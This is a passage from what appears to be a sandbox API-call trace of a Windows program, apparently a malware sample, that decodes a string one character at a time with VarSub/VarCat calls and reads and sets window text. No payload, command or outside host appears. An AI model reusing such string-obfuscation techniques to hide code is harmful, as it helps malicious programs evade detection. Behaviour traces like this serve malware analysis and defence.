lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.105] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.105] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.105] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.106] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0180.106] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.107] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.107] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.108] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.108] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.109] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.109] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.110] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.110] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.111] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.111] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.112] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.112] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.112] GetForegroundWindow () returned 0x1011a [0180.112] GetLastError () returned 0x0 [0180.113] SysStringLen (param_1=" ") returned 0xff [0180.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0180.113] SysStringLen (param_1=" ") returned 0xff [0180.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0180.113] GetWindowTextA (in: hWnd=0x1011a, lpString=0x11644c4, nMaxCount=255 | out: lpString="FolderView") returned 10 [0180.113] GetLastError () returned 0x0 [0180.113] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0180.114] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0180.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="FolderView") returned 256 [0180.114] SysStringLen (param_1="Fold") returned 0x4 [0180.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Fold", cchWideChar=5, lpMultiByteStr=0x116859c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Fold", lpUsedDefaultChar=0x0) returned 5 [0180.114] SetWindowTextA (hWnd=0x103c4, lpString="Fold") returned 1 [0180.115] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf [0180.115] GetFocus () returned 0x0 [0180.115] lstrlenA (lpString="Fold") returned 4 [0180.115] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0180.115] IsWindow (hWnd=0x103c4) returned 1 [0180.115] IsWindow (hWnd=0x103c4) returned 1 [0180.116] IsWindow (hWnd=0x103c4) returned 1 [0180.116] IsWindow (hWnd=0x103c4) returned 1 [0180.116] GetFocus () returned 0x0 [0180.116] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0180.117] GetFocus () returned 0x0 [0180.117] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0180.117] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0180.117] GetFocus () returned 0x0 [0180.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Fold", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0180.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Fold", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=5 | out: lpWideCharStr="Fold") returned 5 [0180.117] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0180.117] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0180.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.119] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0180.119] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="†", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x86\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.120] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="y", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0180.120] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.121] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0180.121] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.122] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.122] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.123] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0180.123] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.123] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.124] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0180.124] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.125] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0180.125] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.126] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.126] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.127] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0180.127] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.128] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0180.128] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.128] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0180.129] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.129] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0180.130] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.130] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.131] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.131] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.131] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.132] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0180.132] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.133] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.181] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.182] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.182] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.183] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0180.183] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.184] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.184] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.185] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0180.185] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.186] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0180.186] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.187] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0180.187] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0180.188] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0180.188] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0180.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, 